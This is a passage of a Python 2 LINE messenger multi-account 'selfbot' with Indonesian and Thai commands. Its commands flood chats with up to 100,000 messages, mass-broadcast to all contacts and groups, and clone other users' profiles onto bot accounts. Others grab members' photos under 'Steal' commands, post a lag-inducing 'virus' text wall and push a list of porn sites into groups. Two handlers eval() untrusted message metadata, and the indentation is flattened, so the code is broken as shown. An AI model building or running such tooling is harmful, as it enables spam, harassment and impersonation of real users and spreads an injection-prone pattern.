except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
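# "backup"/"Backup": restore the profile objects (mybackup / backup) that
# were captured elsewhere in the script.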
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
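# "Spam on N text" sends N separate messages; "Spam off N text" sends one
# message containing the text repeated N times.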
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
for bot in [ki,ki2,ki3,ki4,ki5]:
gid = bot.getGroupIdsJoined()
for i in gid:
bot.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.
1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","")
params = {"songname":" songname"}
r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
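# Toggle invite-by-contact: when wait["ricoinvite"] is on, contacts sent to
# the chat are invited into the group (handled elsewhere in the script).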
elif msg.text in ["Invite on","เชินเปิด"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"🌟เปิดเชิญด้วยคอนแทค🌟")
elif msg.text in ["Invite off","ปิดเชิน"]:
if msg.from_ in admin:
wait["ricoinvite"] = False
random.choice(KAC).sendText(msg.to,"🌟ปิดเชิญ🌟")
#===============================================
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to,mid)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["list"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
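# "#leave": terminates the whole bot process via sys.exit().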
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki5.getProfile()
text = profile.displayName
ki5.sendText(msg.to, text)
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
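# Blacklist commands: targets are stored in wait["blacklist"] and persisted
# to st2__b.json so bans survive restarts.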
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Ban on","ดำ"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unban on","ขาว"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text == 'Banlist':
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
#elif msg.text in ["Whitelist","ขาว"]:
# if msg.from_ in admin:
# wait["wblacklist"] = True
# cl.sendText(msg.to,"send contact to ban")
# elif msg.text in ["Blacklist","ดำ"]:
